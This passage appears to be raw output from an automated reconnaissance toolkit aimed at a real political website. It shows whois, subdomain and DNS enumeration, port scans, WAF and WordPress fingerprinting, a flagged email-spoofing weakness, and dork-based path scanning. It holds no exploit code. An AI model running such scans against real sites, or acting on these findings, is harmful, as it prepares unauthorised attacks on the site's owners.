1357. Trying Zone Transfer for theredelephants.com on ns58.domaincontrol.com ...
1358.  
1359. brute force file not specified, bay.
1360. #######################################################################################################################################
1361. Domain Name: THEREDELEPHANTS.COM
1362. Registry Domain ID: 2073176903_DOMAIN_COM-VRSN
1363. Registrar WHOIS Server: whois.godaddy.com
1364. Registrar URL: http://www.godaddy.com
1365. Updated Date: 2016-11-10T21:43:26Z
1366. Creation Date: 2016-11-10T21:43:26Z
1367. Registry Expiry Date: 2019-11-10T21:43:26Z
1368. Registrar: GoDaddy.com, LLC
1369. Registrar IANA ID: 146
1370. Registrar Abuse Contact Email: abuse@godaddy.com
1371. Registrar Abuse Contact Phone: 480-624-2505
1372. Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
1373. Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
1374. Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
1375. Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
1376. Name Server: NS57.DOMAINCONTROL.COM
1377. Name Server: NS58.DOMAINCONTROL.COM
1378. DNSSEC: unsigned
1379. URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
1380. >>> Last update of whois database: 2018-11-08T05:02:20Z <<<
1381.  
1382. For more information on Whois status codes, please visit https://icann.org/epp
1383.  
1384. NOTICE: The expiration date displayed in this record is the date the
1385. registrar's sponsorship of the domain name registration in the registry is
1386. currently set to expire. This date does not necessarily reflect the expiration
1387. date of the domain name registrant's agreement with the sponsoring
1388. registrar. Users may consult the sponsoring registrar's Whois database to
1389. view the registrar's reported date of expiration for this registration.
1390.  
1391. TERMS OF USE: You are not authorized to access or query our Whois
1392. database through the use of electronic processes that are high-volume and
1393. automated except as reasonably necessary to register domain names or
1394. modify existing registrations; the Data in VeriSign Global Registry
1395. Services' ("VeriSign") Whois database is provided by VeriSign for
1396. information purposes only, and to assist persons in obtaining information
1397. about or related to a domain name registration record. VeriSign does not
1398. guarantee its accuracy. By submitting a Whois query, you agree to abide
1399. by the following terms of use: You agree that you may use this Data only
1400. for lawful purposes and that under no circumstances will you use this Data
1401. to: (1) allow, enable, or otherwise support the transmission of mass
1402. unsolicited, commercial advertising or solicitations via e-mail, telephone,
1403. or facsimile; or (2) enable high volume, automated, electronic processes
1404. that apply to VeriSign (or its computer systems). The compilation,
1405. repackaging, dissemination or other use of this Data is expressly
1406. prohibited without the prior written consent of VeriSign. You agree not to
1407. use electronic processes that are automated and high-volume to access or
1408. query the Whois database except as reasonably necessary to register
1409. domain names or modify existing registrations. VeriSign reserves the right
1410. to restrict your access to the Whois database in its sole discretion to ensure
1411. operational stability. VeriSign may restrict or terminate your access to the
1412. Whois database for failure to abide by these terms of use. VeriSign
1413. reserves the right to modify these terms at any time.
1414.  
1415. The Registry database contains ONLY .COM, .NET, .EDU domains and
1416. Registrars.
1417. Domain Name: theredelephants.com
1418. Registry Domain ID: 2073176903_DOMAIN_COM-VRSN
1419. Registrar WHOIS Server: whois.godaddy.com
1420. Registrar URL: http://www.godaddy.com
1421. Updated Date: 2016-11-10T21:43:26Z
1422. Creation Date: 2016-11-10T21:43:26Z
1423. Registrar Registration Expiration Date: 2019-11-10T21:43:26Z
1424. Registrar: GoDaddy.com, LLC
1425. Registrar IANA ID: 146
1426. Registrar Abuse Contact Email: abuse@godaddy.com
1427. Registrar Abuse Contact Phone: +1.4806242505
1428. Domain Status: clientTransferProhibited http://www.icann.org/epp#clientTransferProhibited
1429. Domain Status: clientUpdateProhibited http://www.icann.org/epp#clientUpdateProhibited
1430. Domain Status: clientRenewProhibited http://www.icann.org/epp#clientRenewProhibited
1431. Domain Status: clientDeleteProhibited http://www.icann.org/epp#clientDeleteProhibited
1432. Registry Registrant ID: Not Available From Registry
1433. Registrant Name: Registration Private
1434. Registrant Organization: Domains By Proxy, LLC
1435. Registrant Street: DomainsByProxy.com
1436. Registrant Street: 14455 N. Hayden Road
1437. Registrant City: Scottsdale
1438. Registrant State/Province: Arizona
1439. Registrant Postal Code: 85260
1440. Registrant Country: US
1441. Registrant Phone: +1.4806242599
1442. Registrant Phone Ext:
1443. Registrant Fax: +1.4806242598
1444. Registrant Fax Ext:
1445. Registrant Email: theredelephants.com@domainsbyproxy.com
1446. Registry Admin ID: Not Available From Registry
1447. Admin Name: Registration Private
1448. Admin Organization: Domains By Proxy, LLC
1449. Admin Street: DomainsByProxy.com
1450. Admin Street: 14455 N. Hayden Road
1451. Admin City: Scottsdale
1452. Admin State/Province: Arizona
1453. Admin Postal Code: 85260
1454. Admin Country: US
1455. Admin Phone: +1.4806242599
1456. Admin Phone Ext:
1457. Admin Fax: +1.4806242598
1458. Admin Fax Ext:
1459. Admin Email: theredelephants.com@domainsbyproxy.com
1460. Registry Tech ID: Not Available From Registry
1461. Tech Name: Registration Private
1462. Tech Organization: Domains By Proxy, LLC
1463. Tech Street: DomainsByProxy.com
1464. Tech Street: 14455 N. Hayden Road
1465. Tech City: Scottsdale
1466. Tech State/Province: Arizona
1467. Tech Postal Code: 85260
1468. Tech Country: US
1469. Tech Phone: +1.4806242599
1470. Tech Phone Ext:
1471. Tech Fax: +1.4806242598
1472. Tech Fax Ext:
1473. Tech Email: theredelephants.com@domainsbyproxy.com
1474. Name Server: NS57.DOMAINCONTROL.COM
1475. Name Server: NS58.DOMAINCONTROL.COM
1476. DNSSEC: unsigned
1477. URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
1478. >>> Last update of WHOIS database: 2018-11-08T05:00:00Z <<<
1479.  
1480. For more information on Whois status codes, please visit https://www.icann.org/resources/pages/epp-status-codes-2014-06-16-en
1481.  
1482. Notes:
1483.  
1484. IMPORTANT: Port43 will provide the ICANN-required minimum data set per
1485. ICANN Temporary Specification, adopted 17 May 2018.
1486. Visit https://whois.godaddy.com to look up contact data for domains
1487. not covered by GDPR policy.
1488.  
1489. The data contained in GoDaddy.com, LLC's WhoIs database,
1490. while believed by the company to be reliable, is provided "as is"
1491. with no guarantee or warranties regarding its accuracy. This
1492. information is provided for the sole purpose of assisting you
1493. in obtaining information about domain name registration records.
1494. Any use of this data for any other purpose is expressly forbidden without the prior written
1495. permission of GoDaddy.com, LLC. By submitting an inquiry,
1496. you agree to these terms of usage and limitations of warranty. In particular,
1497. you agree not to use this data to allow, enable, or otherwise make possible,
1498. dissemination or collection of this data, in part or in its entirety, for any
1499. purpose, such as the transmission of unsolicited advertising and
1500. and solicitations of any kind, including spam. You further agree
1501. not to use this data to enable high volume, automated or robotic electronic
1502. processes designed to collect or compile this data for any purpose,
1503. including mining this data for your own personal or commercial purposes.
1504.  
1505. Please note: the registrant of the domain name is specified
1506. in the "registrant" section. In most cases, GoDaddy.com, LLC
1507. is not the registrant of domain names listed in this database.
1508. #######################################################################################################################################
1509. ____ _ _ _ _ _____
1510.  
1511. [-] Enumerating subdomains now for theredelephants.com
1512. [-] verbosity is enabled, will show the subdomains results in realtime
1513. [-] Searching now in Baidu..
1514. [-] Searching now in Yahoo..
1515. [-] Searching now in Google..
1516. [-] Searching now in Bing..
1517. [-] Searching now in Ask..
1518. [-] Searching now in Netcraft..
1519. [-] Searching now in DNSdumpster..
1520. [-] Searching now in Virustotal..
1521. [-] Searching now in ThreatCrowd..
1522. [-] Searching now in SSL Certificates..
1523. [-] Searching now in PassiveDNS..
1524. SSL Certificates: shop.theredelephants.com
1525. Virustotal: shop.theredelephants.com
1526. Virustotal: www.theredelephants.com
1527. DNSdumpster: shop.theredelephants.com
1528. Bing: shop.theredelephants.com
1529. Google: shop.theredelephants.com
1530. [-] Saving results to file: /usr/share/sniper/loot/theredelephants.com/domains/domains-theredelephants.com.txt
1531. [-] Total Unique Subdomains Found: 2
1532. www.theredelephants.com
1533. shop.theredelephants.com
1534. #######################################################################################################################################
1535. ftp.theredelephants.com,104.196.67.80
1536. theredelephants.com,104.196.67.80
1537. www.theredelephants.com,104.196.67.80
1538. email.theredelephants.com,97.74.135.148,173.201.192.5,173.201.192.20,173.201.192.133,173.201.192.148,173.201.193.5,173.201.193.20,173.201.193.133,173.201.193.148,45.40.130.40,45.40.130.41,68.178.252.5,68.178.252.20,68.178.252.133,68.178.252.148,72.167.218.45,72.167.218.55,72.167.218.173,72.167.218.183,97.74.135.45,97.74.135.55,97.74.135.133
1539. #######################################################################################################################################
1540. [*] Processing domain theredelephants.com
1541. [+] Getting nameservers
1542. 173.201.76.29 - ns58.domaincontrol.com
1543. 216.69.185.29 - ns57.domaincontrol.com
1544. [-] Zone transfer failed
1545.  
1546. [+] TXT records found
1547. "v=spf1 include:spf.protection.outlook.com -all"
1548. "NETORGFT2476217.onmicrosoft.com"
1549.  
1550. [+] MX records found, added to target list
1551. 0 theredelephants-com.mail.protection.outlook.com.
1552.  
1553. [*] Scanning theredelephants.com for A records
1554. 104.196.67.80 - theredelephants.com
1555. 104.196.67.80 - ftp.theredelephants.com
1556. 104.196.67.80 - www.theredelephants.com
1557. 52.97.146.56 - autodiscover.theredelephants.com
1558. 52.97.146.40 - autodiscover.theredelephants.com
1559. 52.97.131.184 - autodiscover.theredelephants.com
1560. 52.97.130.8 - autodiscover.theredelephants.com
1561. 23.227.38.32 - shop.theredelephants.com
1562. 173.201.192.5 - email.theredelephants.com
1563. 173.201.193.148 - email.theredelephants.com
1564. 72.167.218.45 - email.theredelephants.com
1565. 97.74.135.45 - email.theredelephants.com
1566. 72.167.218.173 - email.theredelephants.com
1567. 97.74.135.148 - email.theredelephants.com
1568. 173.201.193.5 - email.theredelephants.com
1569. 97.74.135.133 - email.theredelephants.com
1570. 97.74.135.55 - email.theredelephants.com
1571. 72.167.218.55 - email.theredelephants.com
1572. 173.201.193.133 - email.theredelephants.com
1573. 45.40.130.40 - email.theredelephants.com
1574. 68.178.252.133 - email.theredelephants.com
1575. 45.40.130.41 - email.theredelephants.com
1576. 68.178.252.148 - email.theredelephants.com
1577. 68.178.252.20 - email.theredelephants.com
1578. 173.201.192.148 - email.theredelephants.com
1579. 173.201.193.20 - email.theredelephants.com
1580. 68.178.252.5 - email.theredelephants.com
1581. 72.167.218.183 - email.theredelephants.com
1582. 173.201.192.133 - email.theredelephants.com
1583. 173.201.192.20 - email.theredelephants.com
1584. 52.112.192.75 - sip.theredelephants.com
1585. 52.112.192.206 - lyncdiscover.theredelephants.com
1586. 104.41.216.18 - msoid.theredelephants.com
1587. 104.41.216.16 - msoid.theredelephants.com
1588. 40.112.64.25 - msoid.theredelephants.com
1589. ######################################################################################################################################
1590. [*] Found SPF record:
1591. [*] v=spf1 include:spf.protection.outlook.com -all
1592. [*] SPF record contains an All item: -all
1593. [*] No DMARC record found. Looking for organizational record
1594. [+] No organizational DMARC record
1595. [+] Spoofing possible for theredelephants.com!
1596. #######################################################################################################################################
1597. ____ _____ ___ ______ _/ /_____ ____ ___
1598. / __ `/ __ `/ / / / __ `/ __/ __ \/ __ \/ _ \
1599. / /_/ / /_/ / /_/ / /_/ / /_/ /_/ / / / / __/
1600. \__,_/\__, /\__,_/\__,_/\__/\____/_/ /_/\___/
1601. /_/ discover v0.5.0 - by @michenriksen
1602.  
1603. Identifying nameservers for theredelephants.com... Done
1604. Using nameservers:
1605.  
1606. - 173.201.76.29
1607. - 216.69.185.29
1608.  
1609. Checking for wildcard DNS... Done
1610.  
1611. Running collector: Threat Crowd... Done (0 hosts)
1612. Running collector: DNSDB... Error
1613. -> DNSDB returned unexpected response code: 503
1614. Running collector: Netcraft... Done (0 hosts)
1615. Running collector: PublicWWW... Done (0 hosts)
1616. Running collector: Censys... Skipped
1617. -> Key 'censys_secret' has not been set
1618. Running collector: Wayback Machine... Done (2 hosts)
1619. Running collector: PTRArchive... Error
1620. -> PTRArchive returned unexpected response code: 502
1621. Running collector: PassiveTotal... Skipped
1622. -> Key 'passivetotal_key' has not been set
1623. Running collector: Shodan... Skipped
1624. -> Key 'shodan' has not been set
1625. Running collector: Riddler... Skipped
1626. -> Key 'riddler_username' has not been set
1627. Running collector: VirusTotal... Skipped
1628. -> Key 'virustotal' has not been set
1629. Running collector: Dictionary... Done (0 hosts)
1630. Running collector: HackerTarget... Done (2 hosts)
1631. Running collector: Google Transparency Report... Done (1 host)
1632. Running collector: Certificate Search... Done (1 host)
1633.  
1634. Resolving 2 unique hosts...
1635. 23.227.38.32 shop.theredelephants.com
1636. 104.196.67.80 theredelephants.com
1637.  
1638. Found subnets:
1639.  
1640.  
1641. Wrote 2 hosts to:
1642.  
1643. - file:///root/aquatone/theredelephants.com/hosts.txt
1644. - file:///root/aquatone/theredelephants.com/hosts.json
1645. __
1646. ____ _____ ___ ______ _/ /_____ ____ ___
1647. / __ `/ __ `/ / / / __ `/ __/ __ \/ __ \/ _ \
1648. / /_/ / /_/ / /_/ / /_/ / /_/ /_/ / / / / __/
1649. \__,_/\__, /\__,_/\__,_/\__/\____/_/ /_/\___/
1650. /_/ takeover v0.5.0 - by @michenriksen
1651.  
1652. Loaded 2 hosts from /root/aquatone/theredelephants.com/hosts.json
1653. Loaded 25 domain takeover detectors
1654.  
1655. Identifying nameservers for theredelephants.com... Done
1656. Using nameservers:
1657.  
1658. - 173.201.76.29
1659. - 216.69.185.29
1660.  
1661. Checking hosts for domain takeover vulnerabilities...
1662.  
1663. Finished checking hosts:
1664.  
1665. - Vulnerable : 0
1666. - Not Vulnerable : 2
1667.  
1668. Wrote 0 potential subdomain takeovers to:
1669.  
1670. - file:///root/aquatone/theredelephants.com/takeovers.json
1671.  
1672. __
1673. ____ _____ ___ ______ _/ /_____ ____ ___
1674. / __ `/ __ `/ / / / __ `/ __/ __ \/ __ \/ _ \
1675. / /_/ / /_/ / /_/ / /_/ / /_/ /_/ / / / / __/
1676. \__,_/\__, /\__,_/\__,_/\__/\____/_/ /_/\___/
1677. /_/ scan v0.5.0 - by @michenriksen
1678.  
1679. Loaded 2 hosts from /root/aquatone/theredelephants.com/hosts.json
1680.  
1681. Probing 4 ports...
1682. 80/tcp 23.227.38.32 shop.theredelephants.com
1683. 80/tcp 104.196.67.80 theredelephants.com
1684. 443/tcp 23.227.38.32 shop.theredelephants.com
1685. 443/tcp 104.196.67.80 theredelephants.com
1686.  
1687. Wrote open ports to file:///root/aquatone/theredelephants.com/open_ports.txt
1688. Wrote URLs to file:///root/aquatone/theredelephants.com/urls.txt
1689. __
1690. ____ _____ ___ ______ _/ /_____ ____ ___
1691. / __ `/ __ `/ / / / __ `/ __/ __ \/ __ \/ _ \
1692. / /_/ / /_/ / /_/ / /_/ / /_/ /_/ / / / / __/
1693. \__,_/\__, /\__,_/\__,_/\__/\____/_/ /_/\___/
1694. /_/ gather v0.5.0 - by @michenriksen
1695.  
1696. Processing 4 pages...
1697.  
1698. Incompatability Error: Nightmarejs must be run on a system with a graphical desktop session (X11)
1699.  
1700. Incompatability Error: Nightmarejs must be run on a system with a graphical desktop session (X11)
1701. #######################################################################################################################################
1702. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-08 00:10 EST
1703. Nmap scan report for theredelephants.com (104.196.67.80)
1704. Host is up (0.17s latency).
1705. Not shown: 470 filtered ports, 3 closed ports
1706. Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
1707. PORT STATE SERVICE
1708. 80/tcp open http
1709. 443/tcp open https
1710. 2222/tcp open EtherNetIP-1
1711. #######################################################################################################################################
1712. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-08 00:11 EST
1713. Nmap scan report for theredelephants.com (104.196.67.80)
1714. Host is up (0.12s latency).
1715. Not shown: 2 filtered ports
1716. PORT STATE SERVICE
1717. 53/udp open|filtered domain
1718. 67/udp open|filtered dhcps
1719. 68/udp open|filtered dhcpc
1720. 69/udp open|filtered tftp
1721. 88/udp open|filtered kerberos-sec
1722. 123/udp open|filtered ntp
1723. 139/udp open|filtered netbios-ssn
1724. 161/udp open|filtered snmp
1725. 162/udp open|filtered snmptrap
1726. 389/udp open|filtered ldap
1727. 520/udp open|filtered route
1728. 2049/udp open|filtered nfs
1729. #######################################################################################################################################
1730. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-08 00:11 EST
1731. Nmap scan report for theredelephants.com (104.196.67.80)
1732. Host is up (0.21s latency).
1733.  
1734. PORT STATE SERVICE VERSION
1735. 67/udp open|filtered dhcps
1736. |_dhcp-discover: ERROR: Script execution failed (use -d to debug)
1737. Too many fingerprints match this host to give specific OS details
1738. Network Distance: 18 hops
1739.  
1740. TRACEROUTE (using proto 1/icmp)
1741. HOP RTT ADDRESS
1742. 1 118.89 ms 10.245.200.1
1743. 2 136.49 ms vlan200.bb1.par1.fr.m247.com (185.94.189.129)
1744. 3 119.76 ms 195.42.145.65
1745. 4 127.17 ms 108.170.244.240
1746. 5 127.16 ms 72.14.238.53
1747. 6 202.30 ms 216.239.54.84
1748. 7 210.70 ms 209.85.255.252
1749. 8 210.73 ms 216.239.41.232
1750. 9 ... 17
1751. 18 209.82 ms 104.196.67.80
1752. #######################################################################################################################################
1753. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-08 00:13 EST
1754. Nmap scan report for theredelephants.com (104.196.67.80)
1755. Host is up (0.21s latency).
1756.  
1757. PORT STATE SERVICE VERSION
1758. 68/udp open|filtered dhcpc
1759. Too many fingerprints match this host to give specific OS details
1760. Network Distance: 18 hops
1761.  
1762. TRACEROUTE (using proto 1/icmp)
1763. HOP RTT ADDRESS
1764. 1 119.43 ms 10.245.200.1
1765. 2 130.20 ms vlan200.bb1.par1.fr.m247.com (185.94.189.129)
1766. 3 120.20 ms 195.42.145.65
1767. 4 127.85 ms 108.170.244.240
1768. 5 137.10 ms 72.14.238.53
1769. 6 199.92 ms 216.239.54.84
1770. 7 211.76 ms 209.85.255.252
1771. 8 211.57 ms 216.239.41.232
1772. 9 ... 17
1773. 18 210.64 ms 104.196.67.80
1774. #######################################################################################################################################
1775. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-08 00:16 EST
1776. Nmap scan report for theredelephants.com (104.196.67.80)
1777. Host is up (0.21s latency).
1778.  
1779. PORT STATE SERVICE VERSION
1780. 69/udp open|filtered tftp
1781. Too many fingerprints match this host to give specific OS details
1782. Network Distance: 18 hops
1783.  
1784. TRACEROUTE (using proto 1/icmp)
1785. HOP RTT ADDRESS
1786. 1 119.89 ms 10.245.200.1
1787. 2 122.05 ms vlan200.bb1.par1.fr.m247.com (185.94.189.129)
1788. 3 120.61 ms 195.42.145.65
1789. 4 128.11 ms 108.170.244.240
1790. 5 128.07 ms 72.14.238.53
1791. 6 200.32 ms 216.239.54.84
1792. 7 212.47 ms 209.85.255.252
1793. 8 211.90 ms 216.239.41.232
1794. 9 ... 17
1795. 18 209.79 ms 104.196.67.80
1796. ######################################################################################################################################
1797.  
1798. ^ ^
1799. _ __ _ ____ _ __ _ _ ____
1800. ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
1801. | V V // o // _/ | V V // 0 // 0 // _/
1802. |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
1803. <
1804. ...'
1805.  
1806. WAFW00F - Web Application Firewall Detection Tool
1807.  
1808. By Sandro Gauci && Wendel G. Henrique
1809.  
1810. Checking http://theredelephants.com
1811. The site http://theredelephants.com is behind a ModSecurity (OWASP CRS)
1812. Number of requests: 13
1813. #######################################################################################################################################
1814. http://theredelephants.com [200 OK] Country[UNITED STATES][US], Email[contact@theredelephants.com], IP[104.196.67.80], JQuery[1.12.4], MetaGenerator[Powered by WPBakery Page Builder - drag and drop page builder for WordPress.], Open-Graph-Protocol[article], PoweredBy[WPBakery], Script[application/ld+json,text/javascript], Title[Home - The Red Elephants], UncommonHeaders[link,wpe-backend,x-cacheable,x-pass-why,x-cache-group,x-type], WordPress
1815. ######################################################################################################################################
1816.  
1817. wig - WebApp Information Gatherer
1818.  
1819.  
1820. Scanning http://theredelephants.com...
1821. _______________________________ SITE INFO _______________________________
1822. IP Title
1823. 104.196.67.80 Home - The Red Elephants
1824.  
1825. ________________________________ VERSION ________________________________
1826. Name Versions Type
1827. WordPress 4.9.8 CMS
1828.  
1829. ______________________________ INTERESTING ______________________________
1830. URL Note Type
1831. /readme.html Readme file Interesting
1832. /robots.txt robots.txt index Interesting
1833. /login/ Login Page Interesting
1834. /test/ Test directory Interesting
1835.  
1836. _________________________________ TOOLS _________________________________
1837. Name Link Software
1838. wpscan https://github.com/wpscanteam/wpscan WordPress
1839. CMSmap https://github.com/Dionach/CMSmap WordPress
1840.  
1841. _________________________________________________________________________
1842. Time: 75.4 sec Urls: 271 Fingerprints: 40401
1843. #######################################################################################################################################
1844. HTTP/1.1 200 OK
1845. Date: Thu, 08 Nov 2018 05:20:59 GMT
1846. Content-Type: text/html; charset=UTF-8
1847. Expires: Thu, 19 Nov 1981 08:52:00 GMT
1848. Pragma: no-cache
1849. Link: <http://theredelephants.com/wp-json/>; rel="https://api.w.org/"
1850. Link: <http://theredelephants.com/>; rel=shortlink
1851. WPE-Backend: apache
1852. X-Cacheable: SHORT
1853. Vary: Accept-Encoding,Cookie
1854. Cache-Control: max-age=600, must-revalidate
1855. X-Pass-Why:
1856. X-Cache-Group: normal
1857. X-Type: default
1858. Content-Encoding: gzip
1859. Connection: keep-alive
1860. ######################################################################################################################################
1861. --------------------------------------------------------------------------------------------------------------------------------------
1862.  
1863. [ ! ] Starting SCANNER INURLBR 2.1 at [08-11-2018 00:21:41]
1864. [ ! ] legal disclaimer: Usage of INURLBR for attacking targets without prior mutual consent is illegal.
1865. It is the end user's responsibility to obey all applicable local, state and federal laws.
1866. Developers assume no liability and are not responsible for any misuse or damage caused by this program
1867.  
1868. [ INFO ][ OUTPUT FILE ]:: [ /usr/share/sniper/plugins/slurp/output/inurlbr-theredelephants.com.txt ]
1869. [ INFO ][ DORK ]::[ site:theredelephants.com ]
1870. [ INFO ][ SEARCHING ]:: {
1871. [ INFO ][ ENGINE ]::[ GOOGLE - www.google.cz ]
1872.  
1873. [ INFO ][ SEARCHING ]::
1874. -[:::]
1875. [ INFO ][ ENGINE ]::[ GOOGLE API ]
1876.  
1877. [ INFO ][ SEARCHING ]::
1878. -[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
1879. [ INFO ][ ENGINE ]::[ GOOGLE_GENERIC_RANDOM - www.google.com.my ID: 006688160405527839966:yhpefuwybre ]
1880.  
1881. [ INFO ][ SEARCHING ]::
1882. -[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
1883.  
1884. [ INFO ][ TOTAL FOUND VALUES ]:: [ 100 ]
1885.  
1886.  
1887. _[ - ]::--------------------------------------------------------------------------------------------------------------
1888. |_[ + ] [ 0 / 100 ]-[00:21:52] [ - ]
1889. |_[ + ] Target:: [ https://shop.theredelephants.com/ ]
1890. |_[ + ] Exploit::
1891. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:23.227.38.32:443
1892. |_[ + ] More details:: / - / , ISP:
1893. |_[ + ] Found:: UNIDENTIFIED
1894.  
1895. _[ - ]::--------------------------------------------------------------------------------------------------------------
1896. |_[ + ] [ 1 / 100 ]-[00:21:54] [ - ]
1897. |_[ + ] Target:: [ http://theredelephants.com/ ]
1898. |_[ + ] Exploit::
1899. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
1900. |_[ + ] More details:: / - / , ISP:
1901. |_[ + ] Found:: UNIDENTIFIED
1902.  
1903. _[ - ]::--------------------------------------------------------------------------------------------------------------
1904. |_[ + ] [ 2 / 100 ]-[00:21:56] [ - ]
1905. |_[ + ] Target:: [ http://theredelephants.com/caliguncontrol/ ]
1906. |_[ + ] Exploit::
1907. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
1908. |_[ + ] More details:: / - / , ISP:
1909. |_[ + ] Found:: UNIDENTIFIED
1910.  
1911. _[ - ]::--------------------------------------------------------------------------------------------------------------
1912. |_[ + ] [ 3 / 100 ]-[00:21:58] [ - ]
1913. |_[ + ] Target:: [ http://theredelephants.com/detention/ ]
1914. |_[ + ] Exploit::
1915. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
1916. |_[ + ] More details:: / - / , ISP:
1917. |_[ + ] Found:: UNIDENTIFIED
1918.  
1919. _[ - ]::--------------------------------------------------------------------------------------------------------------
1920. |_[ + ] [ 4 / 100 ]-[00:22:00] [ - ]
1921. |_[ + ] Target:: [ http://theredelephants.com/antifa/ ]
1922. |_[ + ] Exploit::
1923. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
1924. |_[ + ] More details:: / - / , ISP:
1925. |_[ + ] Found:: UNIDENTIFIED
1926.  
1927. _[ - ]::--------------------------------------------------------------------------------------------------------------
1928. |_[ + ] [ 5 / 100 ]-[00:22:03] [ - ]
1929. |_[ + ] Target:: [ http://theredelephants.com/donkeys/ ]
1930. |_[ + ] Exploit::
1931. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
1932. |_[ + ] More details:: / - / , ISP:
1933. |_[ + ] Found:: UNIDENTIFIED
1934.  
1935. _[ - ]::--------------------------------------------------------------------------------------------------------------
1936. |_[ + ] [ 6 / 100 ]-[00:22:06] [ - ]
1937. |_[ + ] Target:: [ http://theredelephants.com/terrorism/ ]
1938. |_[ + ] Exploit::
1939. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
1940. |_[ + ] More details:: / - / , ISP:
1941. |_[ + ] Found:: UNIDENTIFIED
1942.  
1943. _[ - ]::--------------------------------------------------------------------------------------------------------------
1944. |_[ + ] [ 7 / 100 ]-[00:22:08] [ - ]
1945. |_[ + ] Target:: [ http://theredelephants.com/columns/ ]
1946. |_[ + ] Exploit::
1947. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
1948. |_[ + ] More details:: / - / , ISP:
1949. |_[ + ] Found:: UNIDENTIFIED
1950.  
1951. _[ - ]::--------------------------------------------------------------------------------------------------------------
1952. |_[ + ] [ 8 / 100 ]-[00:22:10] [ - ]
1953. |_[ + ] Target:: [ http://theredelephants.com/uncategorized/ ]
1954. |_[ + ] Exploit::
1955. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
1956. |_[ + ] More details:: / - / , ISP:
1957. |_[ + ] Found:: UNIDENTIFIED
1958.  
1959. _[ - ]::--------------------------------------------------------------------------------------------------------------
1960. |_[ + ] [ 9 / 100 ]-[00:22:12] [ - ]
1961. |_[ + ] Target:: [ http://theredelephants.com/elections/ ]
1962. |_[ + ] Exploit::
1963. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
1964. |_[ + ] More details:: / - / , ISP:
1965. |_[ + ] Found:: UNIDENTIFIED
1966.  
1967. _[ - ]::--------------------------------------------------------------------------------------------------------------
1968. |_[ + ] [ 10 / 100 ]-[00:22:15] [ - ]
1969. |_[ + ] Target:: [ http://theredelephants.com/liberals/ ]
1970. |_[ + ] Exploit::
1971. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
1972. |_[ + ] More details:: / - / , ISP:
1973. |_[ + ] Found:: UNIDENTIFIED
1974.  
1975. _[ - ]::--------------------------------------------------------------------------------------------------------------
1976. |_[ + ] [ 11 / 100 ]-[00:22:17] [ - ]
1977. |_[ + ] Target:: [ http://theredelephants.com/trumpsupporters/ ]
1978. |_[ + ] Exploit::
1979. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
1980. |_[ + ] More details:: / - / , ISP:
1981. |_[ + ] Found:: UNIDENTIFIED
1982.  
1983. _[ - ]::--------------------------------------------------------------------------------------------------------------
1984. |_[ + ] [ 12 / 100 ]-[00:22:19] [ - ]
1985. |_[ + ] Target:: [ http://theredelephants.com/terms/ ]
1986. |_[ + ] Exploit::
1987. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
1988. |_[ + ] More details:: / - / , ISP:
1989. |_[ + ] Found:: UNIDENTIFIED
1990.  
1991. _[ - ]::--------------------------------------------------------------------------------------------------------------
1992. |_[ + ] [ 13 / 100 ]-[00:22:21] [ - ]
1993. |_[ + ] Target:: [ http://theredelephants.com/democrats/ ]
1994. |_[ + ] Exploit::
1995. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
1996. |_[ + ] More details:: / - / , ISP:
1997. |_[ + ] Found:: UNIDENTIFIED
1998.  
1999. _[ - ]::--------------------------------------------------------------------------------------------------------------
2000. |_[ + ] [ 14 / 100 ]-[00:22:24] [ - ]
2001. |_[ + ] Target:: [ http://theredelephants.com/gop/ ]
2002. |_[ + ] Exploit::
2003. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
2004. |_[ + ] More details:: / - / , ISP:
2005. |_[ + ] Found:: UNIDENTIFIED
2006.  
2007. _[ - ]::--------------------------------------------------------------------------------------------------------------
2008. |_[ + ] [ 15 / 100 ]-[00:22:26] [ - ]
2009. |_[ + ] Target:: [ http://theredelephants.com/isis/ ]
2010. |_[ + ] Exploit::
2011. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
2012. |_[ + ] More details:: / - / , ISP:
2013. |_[ + ] Found:: UNIDENTIFIED
2014.  
2015. _[ - ]::--------------------------------------------------------------------------------------------------------------
2016. |_[ + ] [ 16 / 100 ]-[00:22:28] [ - ]
2017. |_[ + ] Target:: [ http://theredelephants.com/dnc/ ]
2018. |_[ + ] Exploit::
2019. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
2020. |_[ + ] More details:: / - / , ISP:
2021. |_[ + ] Found:: UNIDENTIFIED
2022.  
